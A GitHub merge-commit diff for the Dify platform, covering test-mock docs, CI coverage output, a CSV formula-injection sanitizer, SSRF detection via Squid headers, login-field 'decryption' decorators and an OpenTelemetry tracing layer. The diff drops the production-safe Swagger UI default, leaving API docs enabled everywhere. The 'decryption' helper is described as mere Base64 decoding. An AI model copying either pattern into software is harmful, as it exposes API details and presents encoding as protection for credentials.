Merge branch 'main' into p332

This commit is contained in:
crazywoola 2025-12-17 10:27:23 +08:00 committed by GitHub
commit 208a81d224
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
202 changed files with 22230 additions and 1494 deletions

View File

@ -76,7 +76,7 @@ Use this checklist when generating or reviewing tests for Dify frontend componen
- [ ] **DO NOT mock base components** (`@/app/components/base/*`)
- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`)
- [ ] Shared mock state reset in `beforeEach`
- [ ] i18n mock returns keys (not empty strings)
- [ ] i18n uses shared mock (auto-loaded); only override locally for custom translations
- [ ] Router mocks match actual Next.js API
- [ ] Mocks reflect actual component conditional behavior
- [ ] Only mock: API services, complex context providers, third-party libs

View File

@ -318,3 +318,4 @@ For more detailed information, refer to:
- `web/jest.config.ts` - Jest configuration
- `web/jest.setup.ts` - Test environment setup
- `web/testing/analyze-component.js` - Component analysis tool
- `web/__mocks__/react-i18next.ts` - Shared i18n mock (auto-loaded by Jest, no explicit mock needed; override locally only for custom translations)

View File

@ -46,12 +46,22 @@ Only mock these categories:
## Essential Mocks
### 1. i18n (Always Required)
### 1. i18n (Auto-loaded via Shared Mock)
A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest.
**No explicit mock needed** for most tests - it returns translation keys as-is.
For tests requiring custom translations, override the mock:
```typescript
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
t: (key: string) => {
const translations: Record<string, string> = {
'my.custom.key': 'Custom translation',
}
return translations[key] || key
},
}),
}))
```
@ -313,7 +323,7 @@ Need to use a component in test?
│ └─ YES → Mock it (next/navigation, external SDKs)
└─ Is it i18n?
└─ YES → Mock to return keys
└─ YES → Uses shared mock (auto-loaded). Override only for custom translations
```
## Factory Function Pattern

View File

@ -26,13 +26,20 @@ import userEvent from '@testing-library/user-event'
// WHY: Mocks must be hoisted to top of file (Jest requirement).
// They run BEFORE imports, so keep them before component imports.
// i18n (always required in Dify)
// WHY: Returns key instead of translation so tests don't depend on i18n files
jest.mock('react-i18next', () => ({
useTranslation: () => ({
t: (key: string) => key,
}),
}))
// i18n (automatically mocked)
// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest
// No explicit mock needed - it returns translation keys as-is
// Override only if custom translations are required:
// jest.mock('react-i18next', () => ({
// useTranslation: () => ({
// t: (key: string) => {
// const customTranslations: Record<string, string> = {
// 'my.custom.key': 'Custom Translation',
// }
// return customTranslations[key] || key
// },
// }),
// }))
// Router (if component uses useRouter, usePathname, useSearchParams)
// WHY: Isolates tests from Next.js routing, enables testing navigation behavior

View File

@ -93,4 +93,12 @@ jobs:
# Create a detailed coverage summary
echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY
echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY
uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY
{
echo ""
echo "<details><summary>File-level coverage (click to expand)</summary>"
echo ""
echo '```'
uv run --project api coverage report -m
echo '```'
echo "</details>"
} >> $GITHUB_STEP_SUMMARY

View File

@ -627,17 +627,7 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION)
# to prevent API information disclosure.
#
# Behavior:
# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default)
# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED
# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check)
# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable)
#
# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT
# SWAGGER_UI_ENABLED=false
SWAGGER_UI_ENABLED=true
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -681,4 +671,4 @@ ANNOTATION_IMPORT_MIN_RECORDS=1
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
# Maximum number of concurrent annotation import tasks per tenant
ANNOTATION_IMPORT_MAX_CONCURRENT=5
ANNOTATION_IMPORT_MAX_CONCURRENT=5

View File

@ -1263,19 +1263,9 @@ class WorkflowLogConfig(BaseSettings):
class SwaggerUIConfig(BaseSettings):
"""
Configuration for Swagger UI documentation.
Security Note: Swagger UI is automatically disabled in PRODUCTION environment
to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly
to enable in production if needed.
"""
SWAGGER_UI_ENABLED: bool | None = Field(
description="Whether to enable Swagger UI in api module. "
"Automatically disabled in PRODUCTION environment for security. "
"Set to true explicitly to enable in production.",
default=None,
SWAGGER_UI_ENABLED: bool = Field(
description="Whether to enable Swagger UI in api module",
default=True,
)
SWAGGER_UI_PATH: str = Field(
@ -1283,23 +1273,6 @@ class SwaggerUIConfig(BaseSettings):
default="/swagger-ui.html",
)
@property
def swagger_ui_enabled(self) -> bool:
"""
Compute whether Swagger UI should be enabled.
If SWAGGER_UI_ENABLED is explicitly set, use that value.
Otherwise, disable in PRODUCTION environment for security.
"""
if self.SWAGGER_UI_ENABLED is not None:
return self.SWAGGER_UI_ENABLED
# Auto-disable in production environment
import os
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
return deploy_env.upper() != "PRODUCTION"
class TenantIsolatedTaskQueueConfig(BaseSettings):
TENANT_ISOLATED_TASK_CONCURRENCY: int = Field(

View File

@ -107,7 +107,7 @@ class KeywordStoreConfig(BaseSettings):
class DatabaseConfig(BaseSettings):
# Database type selector
DB_TYPE: Literal["postgresql", "mysql", "oceanbase"] = Field(
DB_TYPE: Literal["postgresql", "mysql", "oceanbase", "seekdb"] = Field(
description="Database type to use. OceanBase is MySQL-compatible.",
default="postgresql",
)

View File

@ -1,6 +1,6 @@
from typing import Any, Literal
from flask import abort, request
from flask import abort, make_response, request
from flask_restx import Resource, fields, marshal, marshal_with
from pydantic import BaseModel, Field, field_validator
@ -259,7 +259,7 @@ class AnnotationApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/export")
class AnnotationExportApi(Resource):
@console_ns.doc("export_annotations")
@console_ns.doc(description="Export all annotations for an app")
@console_ns.doc(description="Export all annotations for an app with CSV injection protection")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(
200,
@ -274,8 +274,14 @@ class AnnotationExportApi(Resource):
def get(self, app_id):
app_id = str(app_id)
annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id)
response = {"data": marshal(annotation_list, annotation_fields)}
return response, 200
response_data = {"data": marshal(annotation_list, annotation_fields)}
# Create response with secure headers for CSV export
response = make_response(response_data, 200)
response.headers["Content-Type"] = "application/json; charset=utf-8"
response.headers["X-Content-Type-Options"] = "nosniff"
return response
@console_ns.route("/apps/<uuid:app_id>/annotations/<uuid:annotation_id>")

View File

@ -22,7 +22,12 @@ from controllers.console.error import (
NotAllowedCreateWorkspace,
WorkspacesLimitExceeded,
)
from controllers.console.wraps import email_password_login_enabled, setup_required
from controllers.console.wraps import (
decrypt_code_field,
decrypt_password_field,
email_password_login_enabled,
setup_required,
)
from events.tenant_event import tenant_was_created
from libs.helper import EmailStr, extract_remote_ip
from libs.login import current_account_with_tenant
@ -79,6 +84,7 @@ class LoginApi(Resource):
@setup_required
@email_password_login_enabled
@console_ns.expect(console_ns.models[LoginPayload.__name__])
@decrypt_password_field
def post(self):
"""Authenticate user and login."""
args = LoginPayload.model_validate(console_ns.payload)
@ -218,6 +224,7 @@ class EmailCodeLoginSendEmailApi(Resource):
class EmailCodeLoginApi(Resource):
@setup_required
@console_ns.expect(console_ns.models[EmailCodeLoginPayload.__name__])
@decrypt_code_field
def post(self):
args = EmailCodeLoginPayload.model_validate(console_ns.payload)

View File

@ -218,14 +218,14 @@ class DataSourceNotionListApi(Resource):
@console_ns.route(
"/notion/workspaces/<uuid:workspace_id>/pages/<uuid:page_id>/<string:page_type>/preview",
"/notion/pages/<uuid:page_id>/<string:page_type>/preview",
"/datasets/notion-indexing-estimate",
)
class DataSourceNotionApi(Resource):
@setup_required
@login_required
@account_initialization_required
def get(self, workspace_id, page_id, page_type):
def get(self, page_id, page_type):
_, current_tenant_id = current_account_with_tenant()
credential_id = request.args.get("credential_id", default=None, type=str)
@ -239,11 +239,10 @@ class DataSourceNotionApi(Resource):
plugin_id="langgenius/notion_datasource",
)
workspace_id = str(workspace_id)
page_id = str(page_id)
extractor = NotionExtractor(
notion_workspace_id=workspace_id,
notion_workspace_id="",
notion_obj_id=page_id,
notion_page_type=page_type,
notion_access_token=credential.get("integration_secret"),

View File

@ -223,6 +223,7 @@ def _get_retrieval_methods_by_vector_type(vector_type: str | None, is_mock: bool
VectorType.COUCHBASE,
VectorType.OPENGAUSS,
VectorType.OCEANBASE,
VectorType.SEEKDB,
VectorType.TABLESTORE,
VectorType.HUAWEI_CLOUD,
VectorType.TENCENT,

View File

@ -9,10 +9,12 @@ from typing import ParamSpec, TypeVar
from flask import abort, request
from configs import dify_config
from controllers.console.auth.error import AuthenticationFailedError, EmailCodeError
from controllers.console.workspace.error import AccountNotInitializedError
from enums.cloud_plan import CloudPlan
from extensions.ext_database import db
from extensions.ext_redis import redis_client
from libs.encryption import FieldEncryption
from libs.login import current_account_with_tenant
from models.account import AccountStatus
from models.dataset import RateLimitLog
@ -25,6 +27,14 @@ from .error import NotInitValidateError, NotSetupError, UnauthorizedAndForceLogo
P = ParamSpec("P")
R = TypeVar("R")
# Field names for decryption
FIELD_NAME_PASSWORD = "password"
FIELD_NAME_CODE = "code"
# Error messages for decryption failures
ERROR_MSG_INVALID_ENCRYPTED_DATA = "Invalid encrypted data"
ERROR_MSG_INVALID_ENCRYPTED_CODE = "Invalid encrypted code"
def account_initialization_required(view: Callable[P, R]):
@wraps(view)
@ -419,3 +429,75 @@ def annotation_import_concurrency_limit(view: Callable[P, R]):
return view(*args, **kwargs)
return decorated
def _decrypt_field(field_name: str, error_class: type[Exception], error_message: str) -> None:
"""
Helper to decode a Base64 encoded field in the request payload.
Args:
field_name: Name of the field to decode
error_class: Exception class to raise on decoding failure
error_message: Error message to include in the exception
"""
if not request or not request.is_json:
return
# Get the payload dict - it's cached and mutable
payload = request.get_json()
if not payload or field_name not in payload:
return
encoded_value = payload[field_name]
decoded_value = FieldEncryption.decrypt_field(encoded_value)
# If decoding failed, raise error immediately
if decoded_value is None:
raise error_class(error_message)
# Update payload dict in-place with decoded value
# Since payload is a mutable dict and get_json() returns the cached reference,
# modifying it will affect all subsequent accesses including console_ns.payload
payload[field_name] = decoded_value
def decrypt_password_field(view: Callable[P, R]):
"""
Decorator to decrypt password field in request payload.
Automatically decrypts the 'password' field if encryption is enabled.
If decryption fails, raises AuthenticationFailedError.
Usage:
@decrypt_password_field
def post(self):
args = LoginPayload.model_validate(console_ns.payload)
# args.password is now decrypted
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_decrypt_field(FIELD_NAME_PASSWORD, AuthenticationFailedError, ERROR_MSG_INVALID_ENCRYPTED_DATA)
return view(*args, **kwargs)
return decorated
def decrypt_code_field(view: Callable[P, R]):
"""
Decorator to decrypt verification code field in request payload.
Automatically decrypts the 'code' field if encryption is enabled.
If decryption fails, raises EmailCodeError.
Usage:
@decrypt_code_field
def post(self):
args = EmailCodeLoginPayload.model_validate(console_ns.payload)
# args.code is now decrypted
"""
@wraps(view)
def decorated(*args: P.args, **kwargs: P.kwargs):
_decrypt_field(FIELD_NAME_CODE, EmailCodeError, ERROR_MSG_INVALID_ENCRYPTED_CODE)
return view(*args, **kwargs)
return decorated

View File

@ -0,0 +1,89 @@
"""CSV sanitization utilities to prevent formula injection attacks."""
from typing import Any
class CSVSanitizer:
"""
Sanitizer for CSV export to prevent formula injection attacks.
This class provides methods to sanitize data before CSV export by escaping
characters that could be interpreted as formulas by spreadsheet applications
(Excel, LibreOffice, Google Sheets).
Formula injection occurs when user-controlled data starting with special
characters (=, +, -, @, tab, carriage return) is exported to CSV and opened
in a spreadsheet application, potentially executing malicious commands.
"""
# Characters that can start a formula in Excel/LibreOffice/Google Sheets
FORMULA_CHARS = frozenset({"=", "+", "-", "@", "\t", "\r"})
@classmethod
def sanitize_value(cls, value: Any) -> str:
"""
Sanitize a value for safe CSV export.
Prefixes formula-initiating characters with a single quote to prevent
Excel/LibreOffice/Google Sheets from treating them as formulas.
Args:
value: The value to sanitize (will be converted to string)
Returns:
Sanitized string safe for CSV export
Examples:
>>> CSVSanitizer.sanitize_value("=1+1")
"'=1+1"
>>> CSVSanitizer.sanitize_value("Hello World")
"Hello World"
>>> CSVSanitizer.sanitize_value(None)
""
"""
if value is None:
return ""
# Convert to string
str_value = str(value)
# If empty, return as is
if not str_value:
return ""
# Check if first character is a formula initiator
if str_value[0] in cls.FORMULA_CHARS:
# Prefix with single quote to escape
return f"'{str_value}"
return str_value
@classmethod
def sanitize_dict(cls, data: dict[str, Any], fields_to_sanitize: list[str] | None = None) -> dict[str, Any]:
"""
Sanitize specified fields in a dictionary.
Args:
data: Dictionary containing data to sanitize
fields_to_sanitize: List of field names to sanitize.
If None, sanitizes all string fields.
Returns:
Dictionary with sanitized values (creates a shallow copy)
Examples:
>>> data = {"question": "=1+1", "answer": "+calc", "id": "123"}
>>> CSVSanitizer.sanitize_dict(data, ["question", "answer"])
{"question": "'=1+1", "answer": "'+calc", "id": "123"}
"""
sanitized = data.copy()
if fields_to_sanitize is None:
# Sanitize all string fields
fields_to_sanitize = [k for k, v in data.items() if isinstance(v, str)]
for field in fields_to_sanitize:
if field in sanitized:
sanitized[field] = cls.sanitize_value(sanitized[field])
return sanitized

View File

@ -9,6 +9,7 @@ import httpx
from configs import dify_config
from core.helper.http_client_pooling import get_pooled_http_client
from core.tools.errors import ToolSSRFError
logger = logging.getLogger(__name__)
@ -93,6 +94,18 @@ def make_request(method, url, max_retries=SSRF_DEFAULT_MAX_RETRIES, **kwargs):
while retries <= max_retries:
try:
response = client.request(method=method, url=url, **kwargs)
# Check for SSRF protection by Squid proxy
if response.status_code in (401, 403):
# Check if this is a Squid SSRF rejection
server_header = response.headers.get("server", "").lower()
via_header = response.headers.get("via", "").lower()
# Squid typically identifies itself in Server or Via headers
if "squid" in server_header or "squid" in via_header:
raise ToolSSRFError(
f"Access to '{url}' was blocked by SSRF protection. "
f"The URL may point to a private or local network address. "
)
if response.status_code not in STATUS_FORCELIST:
return response

View File

@ -163,7 +163,7 @@ class Vector:
from core.rag.datasource.vdb.lindorm.lindorm_vector import LindormVectorStoreFactory
return LindormVectorStoreFactory
case VectorType.OCEANBASE:
case VectorType.OCEANBASE | VectorType.SEEKDB:
from core.rag.datasource.vdb.oceanbase.oceanbase_vector import OceanBaseVectorFactory
return OceanBaseVectorFactory

View File

@ -27,6 +27,7 @@ class VectorType(StrEnum):
UPSTASH = "upstash"
TIDB_ON_QDRANT = "tidb_on_qdrant"
OCEANBASE = "oceanbase"
SEEKDB = "seekdb"
OPENGAUSS = "opengauss"
TABLESTORE = "tablestore"
HUAWEI_CLOUD = "huawei_cloud"

View File

@ -10,7 +10,7 @@ class NotionInfo(BaseModel):
"""
credential_id: str | None = None
notion_workspace_id: str
notion_workspace_id: str | None = ""
notion_obj_id: str
notion_page_type: str
document: Document | None = None

View File

@ -166,7 +166,7 @@ class ExtractProcessor:
elif extract_setting.datasource_type == DatasourceType.NOTION:
assert extract_setting.notion_info is not None, "notion_info is required"
extractor = NotionExtractor(
notion_workspace_id=extract_setting.notion_info.notion_workspace_id,
notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "",
notion_obj_id=extract_setting.notion_info.notion_obj_id,
notion_page_type=extract_setting.notion_info.notion_page_type,
document_model=extract_setting.notion_info.document,

View File

@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum):
notion_import = "notion"
local_file = "file_upload"
online_document = "online_document"
online_drive = "online_drive"

View File

@ -29,6 +29,10 @@ class ToolApiSchemaError(ValueError):
pass
class ToolSSRFError(ValueError):
pass
class ToolCredentialPolicyViolationError(ValueError):
pass

View File

@ -425,7 +425,7 @@ class ApiBasedToolSchemaParser:
except ToolApiSchemaError as e:
openapi_error = e
# openai parse error, fallback to swagger
# openapi parse error, fallback to swagger
try:
converted_swagger = ApiBasedToolSchemaParser.parse_swagger_to_openapi(
loaded_content, extra_info=extra_info, warning=warning
@ -436,7 +436,6 @@ class ApiBasedToolSchemaParser:
), schema_type
except ToolApiSchemaError as e:
swagger_error = e
# swagger parse error, fallback to openai plugin
try:
openapi_plugin = ApiBasedToolSchemaParser.parse_openai_plugin_json_to_tool_bundle(

View File

@ -140,6 +140,10 @@ class GraphEngine:
pause_handler = PauseCommandHandler()
self._command_processor.register_handler(PauseCommand, pause_handler)
# === Extensibility ===
# Layers allow plugins to extend engine functionality
self._layers: list[GraphEngineLayer] = []
# === Worker Pool Setup ===
# Capture Flask app context for worker threads
flask_app: Flask | None = None
@ -158,6 +162,7 @@ class GraphEngine:
ready_queue=self._ready_queue,
event_queue=self._event_queue,
graph=self._graph,
layers=self._layers,
flask_app=flask_app,
context_vars=context_vars,
min_workers=self._min_workers,
@ -196,10 +201,6 @@ class GraphEngine:
event_emitter=self._event_manager,
)
# === Extensibility ===
# Layers allow plugins to extend engine functionality
self._layers: list[GraphEngineLayer] = []
# === Validation ===
# Ensure all nodes share the same GraphRuntimeState instance
self._validate_graph_state_consistency()

View File

@ -8,9 +8,11 @@ with middleware-like components that can observe events and interact with execut
from .base import GraphEngineLayer
from .debug_logging import DebugLoggingLayer
from .execution_limits import ExecutionLimitsLayer
from .observability import ObservabilityLayer
__all__ = [
"DebugLoggingLayer",
"ExecutionLimitsLayer",
"GraphEngineLayer",
"ObservabilityLayer",
]

View File

@ -9,6 +9,7 @@ from abc import ABC, abstractmethod
from core.workflow.graph_engine.protocols.command_channel import CommandChannel
from core.workflow.graph_events import GraphEngineEvent
from core.workflow.nodes.base.node import Node
from core.workflow.runtime import ReadOnlyGraphRuntimeState
@ -83,3 +84,29 @@ class GraphEngineLayer(ABC):
error: The exception that caused execution to fail, or None if successful
"""
pass
def on_node_run_start(self, node: Node) -> None: # noqa: B027
"""
Called immediately before a node begins execution.
Layers can override to inject behavior (e.g., start spans) prior to node execution.
The node's execution ID is available via `node._node_execution_id` and will be
consistent with all events emitted by this node execution.
Args:
node: The node instance about to be executed
"""
pass
def on_node_run_end(self, node: Node, error: Exception | None) -> None: # noqa: B027
"""
Called after a node finishes execution.
The node's execution ID is available via `node._node_execution_id` and matches
the `id` field in all events emitted by this node execution.
Args:
node: The node instance that just finished execution
error: Exception instance if the node failed, otherwise None
"""
pass

View File

@ -0,0 +1,61 @@
"""
Node-level OpenTelemetry parser interfaces and defaults.
"""
import json
from typing import Protocol
from opentelemetry.trace import Span
from opentelemetry.trace.status import Status, StatusCode
from core.workflow.nodes.base.node import Node
from core.workflow.nodes.tool.entities import ToolNodeData
class NodeOTelParser(Protocol):
"""Parser interface for node-specific OpenTelemetry enrichment."""
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None: ...
class DefaultNodeOTelParser:
"""Fallback parser used when no node-specific parser is registered."""
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None:
span.set_attribute("node.id", node.id)
if node.execution_id:
span.set_attribute("node.execution_id", node.execution_id)
if hasattr(node, "node_type") and node.node_type:
span.set_attribute("node.type", node.node_type.value)
if error:
span.record_exception(error)
span.set_status(Status(StatusCode.ERROR, str(error)))
else:
span.set_status(Status(StatusCode.OK))
class ToolNodeOTelParser:
"""Parser for tool nodes that captures tool-specific metadata."""
def __init__(self) -> None:
self._delegate = DefaultNodeOTelParser()
def parse(self, *, node: Node, span: "Span", error: Exception | None) -> None:
self._delegate.parse(node=node, span=span, error=error)
tool_data = getattr(node, "_node_data", None)
if not isinstance(tool_data, ToolNodeData):
return
span.set_attribute("tool.provider.id", tool_data.provider_id)
span.set_attribute("tool.provider.type", tool_data.provider_type.value)
span.set_attribute("tool.provider.name", tool_data.provider_name)
span.set_attribute("tool.name", tool_data.tool_name)
span.set_attribute("tool.label", tool_data.tool_label)
if tool_data.plugin_unique_identifier:
span.set_attribute("tool.plugin.id", tool_data.plugin_unique_identifier)
if tool_data.credential_id:
span.set_attribute("tool.credential.id", tool_data.credential_id)
if tool_data.tool_configurations:
span.set_attribute("tool.config", json.dumps(tool_data.tool_configurations, ensure_ascii=False))

View File

@ -0,0 +1,169 @@
"""
Observability layer for GraphEngine.
This layer creates OpenTelemetry spans for node execution, enabling distributed
tracing of workflow execution. It establishes OTel context during node execution
so that automatic instrumentation (HTTP requests, DB queries, etc.) automatically
associates with the node span.
"""
import logging
from dataclasses import dataclass
from typing import cast, final
from opentelemetry import context as context_api
from opentelemetry.trace import Span, SpanKind, Tracer, get_tracer, set_span_in_context
from typing_extensions import override
from configs import dify_config
from core.workflow.enums import NodeType
from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_engine.layers.node_parsers import (
DefaultNodeOTelParser,
NodeOTelParser,
ToolNodeOTelParser,
)
from core.workflow.nodes.base.node import Node
from extensions.otel.runtime import is_instrument_flag_enabled
logger = logging.getLogger(__name__)
@dataclass(slots=True)
class _NodeSpanContext:
span: "Span"
token: object
@final
class ObservabilityLayer(GraphEngineLayer):
"""
Layer that creates OpenTelemetry spans for node execution.
This layer:
- Creates a span when a node starts execution
- Establishes OTel context so automatic instrumentation associates with the span
- Sets complete attributes and status when node execution ends
"""
def __init__(self) -> None:
super().__init__()
self._node_contexts: dict[str, _NodeSpanContext] = {}
self._parsers: dict[NodeType, NodeOTelParser] = {}
self._default_parser: NodeOTelParser = cast(NodeOTelParser, DefaultNodeOTelParser())
self._is_disabled: bool = False
self._tracer: Tracer | None = None
self._build_parser_registry()
self._init_tracer()
def _init_tracer(self) -> None:
"""Initialize OpenTelemetry tracer in constructor."""
if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()):
self._is_disabled = True
return
try:
self._tracer = get_tracer(__name__)
except Exception as e:
logger.warning("Failed to get OpenTelemetry tracer: %s", e)
self._is_disabled = True
def _build_parser_registry(self) -> None:
"""Initialize parser registry for node types."""
self._parsers = {
NodeType.TOOL: ToolNodeOTelParser(),
}
def _get_parser(self, node: Node) -> NodeOTelParser:
node_type = getattr(node, "node_type", None)
if isinstance(node_type, NodeType):
return self._parsers.get(node_type, self._default_parser)
return self._default_parser
@override
def on_graph_start(self) -> None:
"""Called when graph execution starts."""
self._node_contexts.clear()
@override
def on_node_run_start(self, node: Node) -> None:
"""
Called when a node starts execution.
Creates a span and establishes OTel context for automatic instrumentation.
"""
if self._is_disabled:
return
try:
if not self._tracer:
return
execution_id = node.execution_id
if not execution_id:
return
parent_context = context_api.get_current()
span = self._tracer.start_span(
f"{node.title}",
kind=SpanKind.INTERNAL,
context=parent_context,
)
new_context = set_span_in_context(span)
token = context_api.attach(new_context)
self._node_contexts[execution_id] = _NodeSpanContext(span=span, token=token)
except Exception as e:
logger.warning("Failed to create OpenTelemetry span for node %s: %s", node.id, e)
@override
def on_node_run_end(self, node: Node, error: Exception | None) -> None:
"""
Called when a node finishes execution.
Sets complete attributes, records exceptions, and ends the span.
"""
if self._is_disabled:
return
try:
execution_id = node.execution_id
if not execution_id:
return
node_context = self._node_contexts.get(execution_id)
if not node_context:
return
span = node_context.span
parser = self._get_parser(node)
try:
parser.parse(node=node, span=span, error=error)
span.end()
finally:
token = node_context.token
if token is not None:
try:
context_api.detach(token)
except Exception:
logger.warning("Failed to detach OpenTelemetry token: %s", token)
self._node_contexts.pop(execution_id, None)
except Exception as e:
logger.warning("Failed to end OpenTelemetry span for node %s: %s", node.id, e)
@override
def on_event(self, event) -> None:
"""Not used in this layer."""
pass
@override
def on_graph_end(self, error: Exception | None) -> None:
"""Called when graph execution ends."""
if self._node_contexts:
logger.warning(
"ObservabilityLayer: %d node spans were not properly ended",
len(self._node_contexts),
)
self._node_contexts.clear()

View File

@ -9,6 +9,7 @@ import contextvars
import queue
import threading
import time
from collections.abc import Sequence
from datetime import datetime
from typing import final
from uuid import uuid4
@ -17,6 +18,7 @@ from flask import Flask
from typing_extensions import override
from core.workflow.graph import Graph
from core.workflow.graph_engine.layers.base import GraphEngineLayer
from core.workflow.graph_events import GraphNodeEventBase, NodeRunFailedEvent
from core.workflow.nodes.base.node import Node
from libs.flask_utils import preserve_flask_contexts
@ -39,6 +41,7 @@ class Worker(threading.Thread):
ready_queue: ReadyQueue,
event_queue: queue.Queue[GraphNodeEventBase],
graph: Graph,
layers: Sequence[GraphEngineLayer],
worker_id: int = 0,
flask_app: Flask | None = None,
context_vars: contextvars.Context | None = None,
@ -50,6 +53,7 @@ class Worker(threading.Thread):
ready_queue: Ready queue containing node IDs ready for execution
event_queue: Queue for pushing execution events
graph: Graph containing nodes to execute
layers: Graph engine layers for node execution hooks
worker_id: Unique identifier for this worker
flask_app: Optional Flask application for context preservation
context_vars: Optional context variables to preserve in worker thread
@ -63,6 +67,7 @@ class Worker(threading.Thread):
self._context_vars = context_vars
self._stop_event = threading.Event()
self._last_task_time = time.time()
self._layers = layers if layers is not None else []
def stop(self) -> None:
"""Signal the worker to stop processing."""
@ -122,20 +127,51 @@ class Worker(threading.Thread):
Args:
node: The node instance to execute
"""
# Execute the node with preserved context if Flask app is provided
node.ensure_execution_id()
error: Exception | None = None
if self._flask_app and self._context_vars:
with preserve_flask_contexts(
flask_app=self._flask_app,
context_vars=self._context_vars,
):
# Execute the node
self._invoke_node_run_start_hooks(node)
try:
node_events = node.run()
for event in node_events:
self._event_queue.put(event)
except Exception as exc:
error = exc
raise
finally:
self._invoke_node_run_end_hooks(node, error)
else:
self._invoke_node_run_start_hooks(node)
try:
node_events = node.run()
for event in node_events:
# Forward event to dispatcher immediately for streaming
self._event_queue.put(event)
else:
# Execute without context preservation
node_events = node.run()
for event in node_events:
# Forward event to dispatcher immediately for streaming
self._event_queue.put(event)
except Exception as exc:
error = exc
raise
finally:
self._invoke_node_run_end_hooks(node, error)
def _invoke_node_run_start_hooks(self, node: Node) -> None:
"""Invoke on_node_run_start hooks for all layers."""
for layer in self._layers:
try:
layer.on_node_run_start(node)
except Exception:
# Silently ignore layer errors to prevent disrupting node execution
continue
def _invoke_node_run_end_hooks(self, node: Node, error: Exception | None) -> None:
"""Invoke on_node_run_end hooks for all layers."""
for layer in self._layers:
try:
layer.on_node_run_end(node, error)
except Exception:
# Silently ignore layer errors to prevent disrupting node execution
continue

View File

@ -14,6 +14,7 @@ from configs import dify_config
from core.workflow.graph import Graph
from core.workflow.graph_events import GraphNodeEventBase
from ..layers.base import GraphEngineLayer
from ..ready_queue import ReadyQueue
from ..worker import Worker
@ -39,6 +40,7 @@ class WorkerPool:
ready_queue: ReadyQueue,
event_queue: queue.Queue[GraphNodeEventBase],
graph: Graph,
layers: list[GraphEngineLayer],
flask_app: "Flask | None" = None,
context_vars: "Context | None" = None,
min_workers: int | None = None,
@ -53,6 +55,7 @@ class WorkerPool:
ready_queue: Ready queue for nodes ready for execution
event_queue: Queue for worker events
graph: The workflow graph
layers: Graph engine layers for node execution hooks
flask_app: Optional Flask app for context preservation
context_vars: Optional context variables
min_workers: Minimum number of workers
@ -65,6 +68,7 @@ class WorkerPool:
self._graph = graph
self._flask_app = flask_app
self._context_vars = context_vars
self._layers = layers
# Scaling parameters with defaults
self._min_workers = min_workers or dify_config.GRAPH_ENGINE_MIN_WORKERS
@ -144,6 +148,7 @@ class WorkerPool:
ready_queue=self._ready_queue,
event_queue=self._event_queue,
graph=self._graph,
layers=self._layers,
worker_id=worker_id,
flask_app=self._flask_app,
context_vars=self._context_vars,

View File

@ -244,6 +244,15 @@ class Node(Generic[NodeDataT]):
def graph_init_params(self) -> "GraphInitParams":
return self._graph_init_params
@property
def execution_id(self) -> str:
return self._node_execution_id
def ensure_execution_id(self) -> str:
if not self._node_execution_id:
self._node_execution_id = str(uuid4())
return self._node_execution_id
def _hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT:
return cast(NodeDataT, self._node_data_type.model_validate(data))
@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]):
raise NotImplementedError
def run(self) -> Generator[GraphNodeEventBase, None, None]:
# Generate a single node execution ID to use for all events
if not self._node_execution_id:
self._node_execution_id = str(uuid4())
execution_id = self.ensure_execution_id()
self._start_at = naive_utc_now()
# Create and push start event with required fields
start_event = NodeRunStartedEvent(
id=self._node_execution_id,
id=execution_id,
node_id=self._node_id,
node_type=self.node_type,
node_title=self.title,
@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]):
if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance]
yield self._dispatch(event)
elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance]
event.id = self._node_execution_id
event.id = self.execution_id
yield event
else:
yield event
@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]):
error_type="WorkflowNodeError",
)
yield NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self._node_id,
node_type=self.node_type,
start_at=self._start_at,
@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]):
match result.status:
case WorkflowNodeExecutionStatus.FAILED:
return NodeRunFailedEvent(
id=self._node_execution_id,
id=self.execution_id,
node_id=self.id,
node_type=self.node_type,
start_at=self._start_at,
@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]):
)
case WorkflowNodeExecutionStatus.SUCCEEDED:
return NodeRunSucceededEvent(
